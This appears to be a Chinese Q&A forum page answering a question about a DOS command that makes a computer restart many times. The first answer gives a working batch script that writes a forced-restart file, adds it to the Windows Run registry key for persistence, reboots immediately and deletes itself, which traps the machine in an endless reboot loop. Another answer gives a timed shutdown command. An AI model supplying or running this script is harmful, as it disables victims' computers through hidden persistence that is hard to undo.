有没有什么dos命令能让电脑重启N多次?

2025-03-17 04:09:59
推荐回答(4个)
回答1:

@echo off
echo shutdown -f -r -t ^0>>d:\aa.bat
reg add "HKEY_LOCAL_MACHINE\software\Microsoft\windows\currentversion\run" /v startup /d "d:\aa.bat" /f>nul
shutdown -r -f -t 0
del /f %0

回答2:

没有这种功能的DOS命令。

回答3:

应该可以,用bat可以达到这个要求。

回答4:

还在么?shutdown -s -t 3